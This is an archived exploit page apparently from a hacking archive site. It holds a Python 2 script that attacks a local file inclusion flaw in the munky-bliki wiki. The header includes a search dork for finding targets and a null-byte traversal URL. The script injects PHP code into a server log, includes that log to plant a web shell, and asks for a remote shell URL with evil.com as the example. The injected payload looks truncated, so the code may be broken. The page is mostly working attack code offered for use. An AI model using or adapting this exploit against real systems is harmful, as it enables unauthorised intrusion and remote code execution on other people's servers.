AOH :: HP Unsorted M :: VA1004.HTM

munky-bliki lfi



munky-bliki lfi
munky-bliki lfi



#!user/bin/python=0D
# -*- coding: cp1256 -*-=0D
#####################################################################################=0D
####                               munky-bliki Lfi                               ####=0D
#####################################################################################=0D
#                                                                                   #=0D
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #=0D
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #=0D
#Our Site : Http://IRCRASH.COM #=0D 
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #=0D
#####################################################################################=0D
#                                                                                   #=0D
#Script Download : http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz=0D 
#                                                                                   #=0D
#DORK : "Copyright =A9 2004 Dovid Kopel"                                              #=0D
#                                                                                   #=0D
#####################################################################################=0D
#                                      [Bug]                                        #=0D
#                                                                                   #=0D
#http://Site/?zone=file.type%00 #=0D 
#                                     [Note]                                        #=0D
#                                                                                   #=0D
#By this exploit u can create a shell on valun site ;)                              #=0D
#                                                                                   #=0D
#####################################################################################=0D
# Site : Http://IRCRASH.COM #=0D 
###################################### TNX GOD ######################################=0D
import httplib,urllib=0D
site=raw_input('Site [Ex www.r3d.com]: ')=0D 
path=raw_input('Path [Ex /munky]: ')=0D
shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ')=0D 
print "[*]Powered by : R3d.W0rm - r3d.w0rm@yahoo.com"=0D 
conn=httplib.HTTPConnection(site)=0D
print "[*]Connected to " + site=0D
print "[*]Sending shell code ..."=0D
conn.request('GET',path + "/?zone=');fclose($fp);?>")=0D
print "[*]Running shell code ..."=0D
data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00')=0D 
print "[*]Shell created"=0D
print "[*]" + site + path + '/r3d.w0rm.php'=0D
=0D
=0D
=0D
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.